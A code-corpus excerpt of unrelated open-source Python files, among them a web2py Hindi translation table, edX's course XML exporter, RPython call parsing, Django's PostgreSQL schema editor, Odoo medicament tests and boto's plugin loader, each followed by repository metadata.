import doctest
return doctest.DocTestSuite()
| gpl-3.0 | -9,205,382,301,484,718,000 | 33.330532 | 97 | 0.646785 | false |
aidan-fitz/instant-press | languages/hi-hi.py | 6 | 10092 | # coding: utf8
{
'"update" is an optional expression like "field1=\'newvalue\'". You cannot update or delete the results of a JOIN': '"update" is an optional expression like "field1=\'newvalue\'". You cannot update or delete the results of a JOIN',
'%Y-%m-%d': '%Y-%m-%d',
'%Y-%m-%d %H:%M:%S': '%Y-%m-%d %H:%M:%S',
'%s rows deleted': '%s पंक्तियाँ मिटाएँ',
'%s rows updated': '%s पंक्तियाँ अद्यतन',
'Admin Panel': 'Admin Panel',
'Are you sure to delete this category?': 'Are you sure to delete this category?',
'Are you sure you want to delete this category?': 'Are you sure you want to delete this category?',
'Articles in Archive ': 'Articles in Archive ',
'Articles with ': 'Articles with ',
'Articles with category': 'Articles with category',
'Articles with tag': 'Articles with tag',
'Available databases and tables': 'उपलब्ध डेटाबेस और तालिका',
'Avatar uploaded': 'Avatar uploaded',
'Avatars are disable.': 'Avatars are disable.',
'Back to the index page': 'Back to the index page',
'Cannot be empty': 'खाली नहीं हो सकता',
'Change Avatar': 'Change Avatar',
'Change Password': 'पासवर्ड बदलें',
'Change about': 'Change about',
'Change author': 'Change author',
'Change content': 'Change content',
'Change css': 'Change css',
'Change description': 'Change description',
'Change email': 'Change email',
'Change extract': 'Change extract',
'Change first name': 'Change first name',
'Change footer': 'Change footer',
'Change front page': 'Change front page',
'Change keywords (sep. by ,)': 'Change keywords (sep. by ,)',
'Change last name': 'Change last name',
'Change logo url': 'Change logo url',
'Change name': 'Change name',
'Change password': 'Change password',
'Change site information': 'Change site information',
'Change subtitle': 'Change subtitle',
'Change title': 'Change title',
'Change url': 'Change url',
'Check to delete': 'हटाने के लिए चुनें',
'Close this window': 'Close this window',
'Comment edit': 'Comment edit',
'Controller': 'Controller',
'Copyright': 'Copyright',
'Current request': 'वर्तमान अनुरोध',
'Current response': 'वर्तमान प्रतिक्रिया',
'Current session': 'वर्तमान सेशन',
'DB Model': 'DB Model',
'Database': 'Database',
'Delete:': 'मिटाना:',
'Edit': 'Edit',
'Edit Profile': 'प्रोफ़ाइल संपादित करें',
'Edit This App': 'Edit This App',
'Edit current record': 'वर्तमान रेकॉर्ड संपादित करें ',
'Error 400!': 'Error 400!',
'Error 404!': 'Error 404!',
'Hello World': 'Hello World',
'Hello from MyApp': 'Hello from MyApp',
'Import/Export': 'आयात / निर्यात',
'Index': 'Index',
'Internal State': 'आंतरिक स्थिति',
'Invalid Query': 'अमान्य प्रश्न',
'Language': 'Language',
'Layout': 'Layout',
'Leave a Reply': 'Leave a Reply',
'Login': 'लॉग इन',
'Logout': 'लॉग आउट',
'Lost Password': 'पासवर्ड खो गया',
'Lost password': 'Lost password',
'Main Menu': 'Main Menu',
'Make sure all words are spelled correctly': 'Make sure all words are spelled correctly',
'Menu Model': 'Menu Model',
'My Profile': 'My Profile',
'New Record': 'नया रेकॉर्ड',
'No comments loaded yet!. If persist enable javascript or update your browser.': 'No comments loaded yet!. If persist enable javascript or update your browser.',
'No databases in this application': 'इस अनुप्रयोग में कोई डेटाबेस नहीं हैं',
'No message receive from server': 'No message receive from server',
'Powered by': 'Powered by',
'Problem with avatars': 'Problem with avatars',
'Problem with categorie id value!': 'Problem with categorie id value!',
'Problem with id value': 'Problem with id value',
'Problem with some submitted values': 'Problem with some submitted values',
'Problem with the values submitted': 'Problem with the values submitted',
'Query:': 'प्रश्न:',
'Register': 'पंजीकृत (रजिस्टर) करना ',
'Rows in table': 'तालिका में पंक्तियाँ ',
'Rows selected': 'चयनित (चुने गये) पंक्तियाँ ',
'Save the content': 'Save the content',
'Show articles': 'Show articles',
'Show categories': 'Show categories',
'Show comments': 'Show comments',
'Show images': 'Show images',
'Show links': 'Show links',
'Show or hide the admin panel': 'Show or hide the admin panel',
'Show styles': 'Show styles',
'Show the list of articles': 'Show the list of articles',
'Show the list of categories': 'Show the list of categories',
'Show the list of comments': 'Show the list of comments',
'Show the list of images': 'Show the list of images',
'Show the list of links': 'Show the list of links',
'Show the list of styles': 'Show the list of styles',
'Show the list of users': 'Show the list of users',
'Show users': 'Show users',
'Showing': 'Showing',
'Sign in': 'Sign in',
'Sign in with your google account': 'Sign in with your google account',
"Sorry, but this article doesn't exist!": "Sorry, but this article doesn't exist!",
'Stylesheet': 'Stylesheet',
'Sure you want to delete this article?': 'Sure you want to delete this article?',
'Sure you want to delete this comment?': 'Sure you want to delete this comment?',
'Sure you want to delete this image?': 'Sure you want to delete this image?',
'Sure you want to delete this link?': 'Sure you want to delete this link?',
'Sure you want to delete this object?': 'सुनिश्चित हैं कि आप इस वस्तु को हटाना चाहते हैं?',
'Sure you want to delete this style?': 'Sure you want to delete this style?',
'Sure you want to delete this user?': 'Sure you want to delete this user?',
'Tags': 'Tags',
'The "query" is a condition like "db.table1.field1==\'value\'". Something like "db.table1.field1==db.table2.field2" results in a SQL JOIN.': 'The "query" is a condition like "db.table1.field1==\'value\'". Something like "db.table1.field1==db.table2.field2" results in a SQL JOIN.',
"The article id doesn't exist": "The article id doesn't exist",
"The article id or page number doesn't exist": "The article id or page number doesn't exist",
"The article id, page number, or reply doesn't exist": "The article id, page number, or reply doesn't exist",
"The comment id doesn't exist": "The comment id doesn't exist",
'The search for': 'The search for',
'There was a problem with values of Year - Month': 'There was a problem with values of Year - Month',
'This article was updated on': 'This article was updated on',
"This function doesn't exist": "This function doesn't exist",
"This function doesn't exist!": "This function doesn't exist!",
'Update:': 'अद्यतन करना:',
'Upload your image': 'Upload your image',
'Url to an image': 'Url to an image',
'Use (...)&(...) for AND, (...)|(...) for OR, and ~(...) for NOT to build more complex queries.': 'Use (...)&(...) for AND, (...)|(...) for OR, and ~(...) for NOT to build more complex queries.',
'Use more general keywords': 'Use more general keywords',
'View': 'View',
'Warning: This will replace your css with the default value from current style. Are you sure you want to continue?': 'Warning: This will replace your css with the default value from current style. Are you sure you want to continue?',
'Welcome %s': 'Welcome %s',
'Welcome to web2py': 'वेब२पाइ (web2py) में आपका स्वागत है',
'You are not logged in': 'You are not logged in',
'You have to sign in to your account before comment': 'You have to sign in to your account before comment',
'You need to sign in as an admin': 'You need to sign in as an admin',
'You need to submit your search text.': 'You need to submit your search text.',
'appadmin is disabled because insecure channel': 'अप आडमिन (appadmin) अक्षम है क्योंकि असुरक्षित चैनल',
'cache': 'cache',
'change password': 'change password',
'click here for online examples': 'ऑनलाइन उदाहरण के लिए यहाँ क्लिक करें',
'click here for the administrative interface': 'प्रशासनिक इंटरफेस के लिए यहाँ क्लिक करें',
'customize me!': 'मुझे अनुकूलित (कस्टमाइज़) करें!',
'data uploaded': 'डाटा अपलोड सम्पन्न ',
'database': 'डेटाबेस',
'database %s select': 'डेटाबेस %s चुनी हुई',
'db': 'db',
'design': 'रचना करें',
'done!': 'हो गया!',
'edit profile': 'edit profile',
'export as csv file': 'csv फ़ाइल के रूप में निर्यात',
'in categories': 'in categories',
'insert new': 'नया डालें',
'insert new %s': 'नया %s डालें',
'invalid request': 'अवैध अनुरोध',
'login': 'login',
'logout': 'logout',
'new record inserted': 'नया रेकॉर्ड डाला',
'next 100 rows': 'अगले 100 पंक्तियाँ',
'not yield any results': 'not yield any results',
'or import from csv file': 'या csv फ़ाइल से आयात',
'previous 100 rows': 'पिछले 100 पंक्तियाँ',
'record': 'record',
'record does not exist': 'रिकॉर्ड मौजूद नहीं है',
'record id': 'रिकॉर्ड पहचानकर्ता (आईडी)',
'register': 'register',
'results': 'results',
'selected': 'चुना हुआ',
'state': 'स्थिति',
'table': 'तालिका',
'unable to parse csv file': 'csv फ़ाइल पार्स करने में असमर्थ',
}
| gpl-2.0 | 3,418,578,968,777,350,000 | 47.857143 | 281 | 0.663743 | false |
proversity-org/edx-platform | common/lib/xmodule/xmodule/modulestore/xml_exporter.py | 12 | 18035 | """
Methods for exporting course data to XML
"""
import logging
from abc import abstractmethod
from six import text_type
import lxml.etree
from xblock.fields import Scope, Reference, ReferenceList, ReferenceValueDict
from xmodule.contentstore.content import StaticContent
from xmodule.exceptions import NotFoundError
from xmodule.assetstore import AssetMetadata
from xmodule.modulestore import EdxJSONEncoder, ModuleStoreEnum
from xmodule.modulestore.inheritance import own_metadata
from xmodule.modulestore.store_utilities import draft_node_constructor, get_draft_subtree_roots
from xmodule.modulestore import LIBRARY_ROOT
from fs.osfs import OSFS
from json import dumps
import os
from xmodule.modulestore.draft_and_published import DIRECT_ONLY_CATEGORIES
from opaque_keys.edx.locator import CourseLocator, LibraryLocator
DRAFT_DIR = "drafts"
PUBLISHED_DIR = "published"
DEFAULT_CONTENT_FIELDS = ['metadata', 'data']
def _export_drafts(modulestore, course_key, export_fs, xml_centric_course_key):
"""
Exports course drafts.
"""
# NOTE: we need to explicitly implement the logic for setting the vertical's parent
# and index here since the XML modulestore cannot load draft modules
with modulestore.branch_setting(ModuleStoreEnum.Branch.draft_preferred, course_key):
draft_modules = modulestore.get_items(
course_key,
qualifiers={'category': {'$nin': DIRECT_ONLY_CATEGORIES}},
revision=ModuleStoreEnum.RevisionOption.draft_only
)
# Check to see if the returned draft modules have changes w.r.t. the published module.
# Only modules with changes will be exported into the /drafts directory.
draft_modules = [module for module in draft_modules if modulestore.has_changes(module)]
if draft_modules:
draft_course_dir = export_fs.makedir(DRAFT_DIR, recreate=True)
# accumulate tuples of draft_modules and their parents in
# this list:
draft_node_list = []
for draft_module in draft_modules:
parent_loc = modulestore.get_parent_location(
draft_module.location,
revision=ModuleStoreEnum.RevisionOption.draft_preferred
)
# if module has no parent, set its parent_url to `None`
parent_url = None
if parent_loc is not None:
parent_url = text_type(parent_loc)
draft_node = draft_node_constructor(
draft_module,
location=draft_module.location,
url=text_type(draft_module.location),
parent_location=parent_loc,
parent_url=parent_url,
)
draft_node_list.append(draft_node)
for draft_node in get_draft_subtree_roots(draft_node_list):
# only export the roots of the draft subtrees
# since export_from_xml (called by `add_xml_to_node`)
# exports a whole tree
# ensure module has "xml_attributes" attr
if not hasattr(draft_node.module, 'xml_attributes'):
draft_node.module.xml_attributes = {}
# Don't try to export orphaned items
# and their descendents
if draft_node.parent_location is None:
continue
logging.debug('parent_loc = %s', draft_node.parent_location)
draft_node.module.xml_attributes['parent_url'] = draft_node.parent_url
parent = modulestore.get_item(draft_node.parent_location)
# Don't try to export orphaned items
if draft_node.module.location not in parent.children:
continue
index = parent.children.index(draft_node.module.location)
draft_node.module.xml_attributes['index_in_children_list'] = str(index)
draft_node.module.runtime.export_fs = draft_course_dir
adapt_references(draft_node.module, xml_centric_course_key, draft_course_dir)
node = lxml.etree.Element('unknown')
draft_node.module.add_xml_to_node(node)
class ExportManager(object):
"""
Manages XML exporting for courselike objects.
"""
def __init__(self, modulestore, contentstore, courselike_key, root_dir, target_dir):
"""
Export all modules from `modulestore` and content from `contentstore` as xml to `root_dir`.
`modulestore`: A `ModuleStore` object that is the source of the modules to export
`contentstore`: A `ContentStore` object that is the source of the content to export, can be None
`courselike_key`: The Locator of the Descriptor to export
`root_dir`: The directory to write the exported xml to
`target_dir`: The name of the directory inside `root_dir` to write the content to
"""
self.modulestore = modulestore
self.contentstore = contentstore
self.courselike_key = courselike_key
self.root_dir = root_dir
self.target_dir = text_type(target_dir)
@abstractmethod
def get_key(self):
"""
Get the courselike locator key
"""
raise NotImplementedError
def process_root(self, root, export_fs):
"""
Perform any additional tasks to the root XML node.
"""
def process_extra(self, root, courselike, root_courselike_dir, xml_centric_courselike_key, export_fs):
"""
Process additional content, like static assets.
"""
def post_process(self, root, export_fs):
"""
Perform any final processing after the other export tasks are done.
"""
@abstractmethod
def get_courselike(self):
"""
Get the target courselike object for this export.
"""
def export(self):
"""
Perform the export given the parameters handed to this class at init.
"""
with self.modulestore.bulk_operations(self.courselike_key):
fsm = OSFS(self.root_dir)
root = lxml.etree.Element('unknown')
# export only the published content
with self.modulestore.branch_setting(ModuleStoreEnum.Branch.published_only, self.courselike_key):
courselike = self.get_courselike()
export_fs = courselike.runtime.export_fs = fsm.makedir(self.target_dir, recreate=True)
# change all of the references inside the course to use the xml expected key type w/o version & branch
xml_centric_courselike_key = self.get_key()
adapt_references(courselike, xml_centric_courselike_key, export_fs)
courselike.add_xml_to_node(root)
# Make any needed adjustments to the root node.
self.process_root(root, export_fs)
# Process extra items-- drafts, assets, etc
root_courselike_dir = self.root_dir + '/' + self.target_dir
self.process_extra(root, courselike, root_courselike_dir, xml_centric_courselike_key, export_fs)
# Any last pass adjustments
self.post_process(root, export_fs)
class CourseExportManager(ExportManager):
"""
Export manager for courses.
"""
def get_key(self):
return CourseLocator(
self.courselike_key.org, self.courselike_key.course, self.courselike_key.run, deprecated=True
)
def get_courselike(self):
# depth = None: Traverses down the entire course structure.
# lazy = False: Loads and caches all block definitions during traversal for fast access later
# -and- to eliminate many round-trips to read individual definitions.
# Why these parameters? Because a course export needs to access all the course block information
# eventually. Accessing it all now at the beginning increases performance of the export.
return self.modulestore.get_course(self.courselike_key, depth=None, lazy=False)
def process_root(self, root, export_fs):
with export_fs.open(u'course.xml', 'wb') as course_xml:
lxml.etree.ElementTree(root).write(course_xml, encoding='utf-8')
def process_extra(self, root, courselike, root_courselike_dir, xml_centric_courselike_key, export_fs):
# Export the modulestore's asset metadata.
asset_dir = root_courselike_dir + '/' + AssetMetadata.EXPORTED_ASSET_DIR + '/'
if not os.path.isdir(asset_dir):
os.makedirs(asset_dir)
asset_root = lxml.etree.Element(AssetMetadata.ALL_ASSETS_XML_TAG)
course_assets = self.modulestore.get_all_asset_metadata(self.courselike_key, None)
for asset_md in course_assets:
# All asset types are exported using the "asset" tag - but their asset type is specified in each asset key.
asset = lxml.etree.SubElement(asset_root, AssetMetadata.ASSET_XML_TAG)
asset_md.to_xml(asset)
with OSFS(asset_dir).open(AssetMetadata.EXPORTED_ASSET_FILENAME, 'wb') as asset_xml_file:
lxml.etree.ElementTree(asset_root).write(asset_xml_file, encoding='utf-8')
# export the static assets
policies_dir = export_fs.makedir('policies', recreate=True)
if self.contentstore:
self.contentstore.export_all_for_course(
self.courselike_key,
root_courselike_dir + '/static/',
root_courselike_dir + '/policies/assets.json',
)
# If we are using the default course image, export it to the
# legacy location to support backwards compatibility.
if courselike.course_image == courselike.fields['course_image'].default:
try:
course_image = self.contentstore.find(
StaticContent.compute_location(
courselike.id,
courselike.course_image
),
)
except NotFoundError:
pass
else:
output_dir = root_courselike_dir + '/static/images/'
if not os.path.isdir(output_dir):
os.makedirs(output_dir)
with OSFS(output_dir).open(u'course_image.jpg', 'wb') as course_image_file:
course_image_file.write(course_image.data)
# export the static tabs
export_extra_content(
export_fs, self.modulestore, self.courselike_key, xml_centric_courselike_key,
'static_tab', 'tabs', '.html'
)
# export the custom tags
export_extra_content(
export_fs, self.modulestore, self.courselike_key, xml_centric_courselike_key,
'custom_tag_template', 'custom_tags'
)
# export the course updates
export_extra_content(
export_fs, self.modulestore, self.courselike_key, xml_centric_courselike_key,
'course_info', 'info', '.html'
)
# export the 'about' data (e.g. overview, etc.)
export_extra_content(
export_fs, self.modulestore, self.courselike_key, xml_centric_courselike_key,
'about', 'about', '.html'
)
course_policy_dir_name = courselike.location.run
if courselike.url_name != courselike.location.run and courselike.url_name == 'course':
# Use url_name for split mongo because course_run is not used when loading policies.
course_policy_dir_name = courselike.url_name
course_run_policy_dir = policies_dir.makedir(course_policy_dir_name, recreate=True)
# export the grading policy
with course_run_policy_dir.open(u'grading_policy.json', 'wb') as grading_policy:
grading_policy.write(dumps(courselike.grading_policy, cls=EdxJSONEncoder,
sort_keys=True, indent=4).encode('utf-8'))
# export all of the course metadata in policy.json
with course_run_policy_dir.open(u'policy.json', 'wb') as course_policy:
policy = {'course/' + courselike.location.block_id: own_metadata(courselike)}
course_policy.write(dumps(policy, cls=EdxJSONEncoder, sort_keys=True, indent=4).encode('utf-8'))
_export_drafts(self.modulestore, self.courselike_key, export_fs, xml_centric_courselike_key)
class LibraryExportManager(ExportManager):
"""
Export manager for Libraries
"""
def get_key(self):
"""
Get the library locator for the current library key.
"""
return LibraryLocator(
self.courselike_key.org, self.courselike_key.library
)
def get_courselike(self):
"""
Get the library from the modulestore.
"""
return self.modulestore.get_library(self.courselike_key, depth=None, lazy=False)
def process_root(self, root, export_fs):
"""
Add extra attributes to the root XML file.
"""
root.set('org', self.courselike_key.org)
root.set('library', self.courselike_key.library)
def process_extra(self, root, courselike, root_courselike_dir, xml_centric_courselike_key, export_fs):
"""
Notionally, libraries may have assets. This is currently unsupported, but the structure is here
to ease in duck typing during import. This may be expanded as a useful feature eventually.
"""
# export the static assets
export_fs.makedir('policies', recreate=True)
if self.contentstore:
self.contentstore.export_all_for_course(
self.courselike_key,
self.root_dir + '/' + self.target_dir + '/static/',
self.root_dir + '/' + self.target_dir + '/policies/assets.json',
)
def post_process(self, root, export_fs):
"""
Because Libraries are XBlocks, they aren't exported in the same way Course Modules
are, but instead use the standard XBlock serializers. Accordingly, we need to
create our own index file to act as the equivalent to the root course.xml file,
called library.xml.
"""
# Create the Library.xml file, which acts as the index of all library contents.
xml_file = export_fs.open(LIBRARY_ROOT, 'wb')
xml_file.write(lxml.etree.tostring(root, pretty_print=True, encoding='utf-8'))
xml_file.close()
def export_course_to_xml(modulestore, contentstore, course_key, root_dir, course_dir):
"""
Thin wrapper for the Course Export Manager. See ExportManager for details.
"""
CourseExportManager(modulestore, contentstore, course_key, root_dir, course_dir).export()
def export_library_to_xml(modulestore, contentstore, library_key, root_dir, library_dir):
"""
Thin wrapper for the Library Export Manager. See ExportManager for details.
"""
LibraryExportManager(modulestore, contentstore, library_key, root_dir, library_dir).export()
def adapt_references(subtree, destination_course_key, export_fs):
"""
Map every reference in the subtree into destination_course_key and set it back into the xblock fields
"""
subtree.runtime.export_fs = export_fs # ensure everything knows where it's going!
for field_name, field in subtree.fields.iteritems():
if field.is_set_on(subtree):
if isinstance(field, Reference):
value = field.read_from(subtree)
if value is not None:
field.write_to(subtree, field.read_from(subtree).map_into_course(destination_course_key))
elif field_name == 'children':
# don't change the children field but do recurse over the children
[adapt_references(child, destination_course_key, export_fs) for child in subtree.get_children()]
elif isinstance(field, ReferenceList):
field.write_to(
subtree,
[ele.map_into_course(destination_course_key) for ele in field.read_from(subtree)]
)
elif isinstance(field, ReferenceValueDict):
field.write_to(
subtree, {
key: ele.map_into_course(destination_course_key) for key, ele in field.read_from(subtree).iteritems()
}
)
def _export_field_content(xblock_item, item_dir):
"""
Export all fields related to 'xblock_item' other than 'metadata' and 'data' to json file in provided directory
"""
module_data = xblock_item.get_explicitly_set_fields_by_scope(Scope.content)
if isinstance(module_data, dict):
for field_name in module_data:
if field_name not in DEFAULT_CONTENT_FIELDS:
# filename format: {dirname}.{field_name}.json
with item_dir.open(u'{0}.{1}.{2}'.format(xblock_item.location.block_id, field_name, 'json'),
'wb') as field_content_file:
field_content_file.write(dumps(module_data.get(field_name, {}), cls=EdxJSONEncoder,
sort_keys=True, indent=4).encode('utf-8'))
def export_extra_content(export_fs, modulestore, source_course_key, dest_course_key, category_type, dirname, file_suffix=''):
items = modulestore.get_items(source_course_key, qualifiers={'category': category_type})
if len(items) > 0:
item_dir = export_fs.makedir(dirname, recreate=True)
for item in items:
adapt_references(item, dest_course_key, export_fs)
with item_dir.open(item.location.block_id + file_suffix, 'wb') as item_file:
item_file.write(item.data.encode('utf8'))
# export content fields other then metadata and data in json format in current directory
_export_field_content(item, item_dir)
| agpl-3.0 | -5,251,375,027,366,788,000 | 43.095355 | 125 | 0.623233 | false |
jptomo/rpython-lang-scheme | rpython/rtyper/callparse.py | 1 | 4745 | from rpython.annotator.argument import ArgumentsForTranslation, ArgErr
from rpython.annotator import model as annmodel
from rpython.rtyper import rtuple
from rpython.rtyper.error import TyperError
from rpython.rtyper.lltypesystem import lltype
class ArgumentsForRtype(ArgumentsForTranslation):
def newtuple(self, items):
return NewTupleHolder(items)
def unpackiterable(self, it):
assert it.is_tuple()
items = it.items()
return list(items)
def getrinputs(rtyper, graph):
"""Return the list of reprs of the input arguments to the 'graph'."""
return [rtyper.bindingrepr(v) for v in graph.getargs()]
def getrresult(rtyper, graph):
"""Return the repr of the result variable of the 'graph'."""
if graph.getreturnvar().annotation is not None:
return rtyper.bindingrepr(graph.getreturnvar())
else:
return lltype.Void
def getsig(rtyper, graph):
"""Return the complete 'signature' of the graph."""
return (graph.signature,
graph.defaults,
getrinputs(rtyper, graph),
getrresult(rtyper, graph))
def callparse(rtyper, graph, hop, r_self=None):
"""Parse the arguments of 'hop' when calling the given 'graph'.
"""
rinputs = getrinputs(rtyper, graph)
def args_h(start):
return [VarHolder(i, hop.args_s[i])
for i in range(start, hop.nb_args)]
if r_self is None:
start = 1
else:
start = 0
rinputs[0] = r_self
opname = hop.spaceop.opname
if opname == "simple_call":
arguments = ArgumentsForRtype(args_h(start))
elif opname == "call_args":
arguments = ArgumentsForRtype.fromshape(
hop.args_s[start].const, # shape
args_h(start+1))
# parse the arguments according to the function we are calling
signature = graph.signature
defs_h = []
if graph.defaults:
for x in graph.defaults:
defs_h.append(ConstHolder(x))
try:
holders = arguments.match_signature(signature, defs_h)
except ArgErr, e:
raise TyperError("signature mismatch: %s" % e.getmsg(graph.name))
assert len(holders) == len(rinputs), "argument parsing mismatch"
vlist = []
for h,r in zip(holders, rinputs):
v = h.emit(r, hop)
vlist.append(v)
return vlist
class Holder(object):
def is_tuple(self):
return False
def emit(self, repr, hop):
try:
cache = self._cache
except AttributeError:
cache = self._cache = {}
try:
return cache[repr]
except KeyError:
v = self._emit(repr, hop)
cache[repr] = v
return v
class VarHolder(Holder):
def __init__(self, num, s_obj):
self.num = num
self.s_obj = s_obj
def is_tuple(self):
return isinstance(self.s_obj, annmodel.SomeTuple)
def items(self):
assert self.is_tuple()
n = len(self.s_obj.items)
return tuple([ItemHolder(self, i) for i in range(n)])
def _emit(self, repr, hop):
return hop.inputarg(repr, arg=self.num)
def access(self, hop):
repr = hop.args_r[self.num]
return repr, self.emit(repr, hop)
class ConstHolder(Holder):
def __init__(self, value):
self.value = value
def is_tuple(self):
return type(self.value) is tuple
def items(self):
assert self.is_tuple()
return self.value
def _emit(self, repr, hop):
return hop.inputconst(repr, self.value)
class NewTupleHolder(Holder):
def __new__(cls, holders):
for h in holders:
if not isinstance(h, ItemHolder) or not h.holder == holders[0].holder:
break
else:
if 0 < len(holders) == len(holders[0].holder.items()):
return holders[0].holder
inst = Holder.__new__(cls)
inst.holders = tuple(holders)
return inst
def is_tuple(self):
return True
def items(self):
return self.holders
def _emit(self, repr, hop):
assert isinstance(repr, rtuple.TupleRepr)
tupleitems_v = []
for h in self.holders:
v = h.emit(repr.items_r[len(tupleitems_v)], hop)
tupleitems_v.append(v)
vtuple = repr.newtuple(hop.llops, repr, tupleitems_v)
return vtuple
class ItemHolder(Holder):
def __init__(self, holder, index):
self.holder = holder
self.index = index
def _emit(self, repr, hop):
index = self.index
r_tup, v_tuple = self.holder.access(hop)
v = r_tup.getitem_internal(hop, v_tuple, index)
return hop.llops.convertvar(v, r_tup.items_r[index], repr)
| mit | 3,914,594,531,846,699,500 | 28.110429 | 82 | 0.600421 | false |
smi96/django-blog_website | lib/python2.7/site-packages/django/db/backends/postgresql/schema.py | 202 | 4100 | import psycopg2
from django.db.backends.base.schema import BaseDatabaseSchemaEditor
class DatabaseSchemaEditor(BaseDatabaseSchemaEditor):
sql_alter_column_type = "ALTER COLUMN %(column)s TYPE %(type)s USING %(column)s::%(type)s"
sql_create_sequence = "CREATE SEQUENCE %(sequence)s"
sql_delete_sequence = "DROP SEQUENCE IF EXISTS %(sequence)s CASCADE"
sql_set_sequence_max = "SELECT setval('%(sequence)s', MAX(%(column)s)) FROM %(table)s"
sql_create_varchar_index = "CREATE INDEX %(name)s ON %(table)s (%(columns)s varchar_pattern_ops)%(extra)s"
sql_create_text_index = "CREATE INDEX %(name)s ON %(table)s (%(columns)s text_pattern_ops)%(extra)s"
def quote_value(self, value):
return psycopg2.extensions.adapt(value)
def _model_indexes_sql(self, model):
output = super(DatabaseSchemaEditor, self)._model_indexes_sql(model)
if not model._meta.managed or model._meta.proxy or model._meta.swapped:
return output
for field in model._meta.local_fields:
db_type = field.db_type(connection=self.connection)
if db_type is not None and (field.db_index or field.unique):
# Fields with database column types of `varchar` and `text` need
# a second index that specifies their operator class, which is
# needed when performing correct LIKE queries outside the
# C locale. See #12234.
#
# The same doesn't apply to array fields such as varchar[size]
# and text[size], so skip them.
if '[' in db_type:
continue
if db_type.startswith('varchar'):
output.append(self._create_index_sql(
model, [field], suffix='_like', sql=self.sql_create_varchar_index))
elif db_type.startswith('text'):
output.append(self._create_index_sql(
model, [field], suffix='_like', sql=self.sql_create_text_index))
return output
def _alter_column_type_sql(self, table, old_field, new_field, new_type):
"""
Makes ALTER TYPE with SERIAL make sense.
"""
if new_type.lower() == "serial":
column = new_field.column
sequence_name = "%s_%s_seq" % (table, column)
return (
(
self.sql_alter_column_type % {
"column": self.quote_name(column),
"type": "integer",
},
[],
),
[
(
self.sql_delete_sequence % {
"sequence": self.quote_name(sequence_name),
},
[],
),
(
self.sql_create_sequence % {
"sequence": self.quote_name(sequence_name),
},
[],
),
(
self.sql_alter_column % {
"table": self.quote_name(table),
"changes": self.sql_alter_column_default % {
"column": self.quote_name(column),
"default": "nextval('%s')" % self.quote_name(sequence_name),
}
},
[],
),
(
self.sql_set_sequence_max % {
"table": self.quote_name(table),
"column": self.quote_name(column),
"sequence": self.quote_name(sequence_name),
},
[],
),
],
)
else:
return super(DatabaseSchemaEditor, self)._alter_column_type_sql(
table, old_field, new_field, new_type
)
| mit | 2,130,684,223,850,867,500 | 41.708333 | 110 | 0.467561 | false |
laslabs/vertical-medical | medical_medicament_us/tests/test_medical_medicament.py | 1 | 2603 | # -*- coding: utf-8 -*-
# Copyright 2016 LasLabs Inc.
# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl.html).
from openerp.tests.common import TransactionCase
class TestMedicalMedicament(TransactionCase):
def setUp(self):
super(TestMedicalMedicament, self).setUp()
self.test_gcn = self.env['medical.medicament.gcn'].create({})
self.test_drug_form = self.env.ref('medical_medicament.AEM')
def _new_medicament(self, extra_values):
base_values = {
'drug_form_id': self.test_drug_form.id,
'name': 'Test Medicament',
'gcn_id': self.test_gcn.id,
}
base_values.update(extra_values)
return self.env['medical.medicament'].create(base_values)
def test_compute_brand_ids_no_gcn_id(self):
'''It should return an empty recordset for medicaments without a GCN'''
test_medicament = self._new_medicament({'gcn_id': None})
self.assertFalse(test_medicament.brand_ids)
def test_compute_brand_ids_no_matches(self):
'''It should return empty recordset when there are no brand variants'''
test_medicament = self._new_medicament({'gpi': '1'})
self.assertFalse(test_medicament.brand_ids)
def test_compute_brand_ids_valid_matches(self):
'''It should return all matching medicaments, including self'''
test_medicament = self._new_medicament({'gpi': '2'})
test_medicament_2 = self._new_medicament({'gpi': '2'})
self._new_medicament({'gpi': '1'})
self.assertEqual(
test_medicament.brand_ids.ids,
[test_medicament.id, test_medicament_2.id],
)
def test_compute_generic_ids_no_gcn_id(self):
'''It should return an empty recordset for medicaments without a GCN'''
test_medicament = self._new_medicament({'gcn_id': None})
self.assertFalse(test_medicament.generic_ids)
def test_compute_generic_ids_no_matches(self):
'''It should return empty recordset if there are no generic variants'''
test_medicament = self._new_medicament({'gpi': '2'})
self.assertFalse(test_medicament.generic_ids)
def test_compute_generic_ids_valid_matches(self):
'''It should return all matching medicaments, including self'''
test_medicament = self._new_medicament({'gpi': '1'})
test_medicament_2 = self._new_medicament({'gpi': '1'})
self._new_medicament({'gpi': '2'})
self.assertEqual(
test_medicament.generic_ids.ids,
[test_medicament.id, test_medicament_2.id],
)
| agpl-3.0 | -6,770,298,627,955,971,000 | 36.185714 | 79 | 0.634268 | false |
palladius/gcloud | packages/gsutil/boto/boto/plugin.py | 111 | 2695 | # Copyright 2010 Google Inc.
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
"""
Implements plugin related api.
To define a new plugin just subclass Plugin, like this.
class AuthPlugin(Plugin):
pass
Then start creating subclasses of your new plugin.
class MyFancyAuth(AuthPlugin):
capability = ['sign', 'vmac']
The actual interface is duck typed.
"""
import glob
import imp, os.path
class Plugin(object):
"""Base class for all plugins."""
capability = []
@classmethod
def is_capable(cls, requested_capability):
"""Returns true if the requested capability is supported by this plugin
"""
for c in requested_capability:
if not c in cls.capability:
return False
return True
def get_plugin(cls, requested_capability=None):
if not requested_capability:
requested_capability = []
result = []
for handler in cls.__subclasses__():
if handler.is_capable(requested_capability):
result.append(handler)
return result
def _import_module(filename):
(path, name) = os.path.split(filename)
(name, ext) = os.path.splitext(name)
(file, filename, data) = imp.find_module(name, [path])
try:
return imp.load_module(name, file, filename, data)
finally:
if file:
file.close()
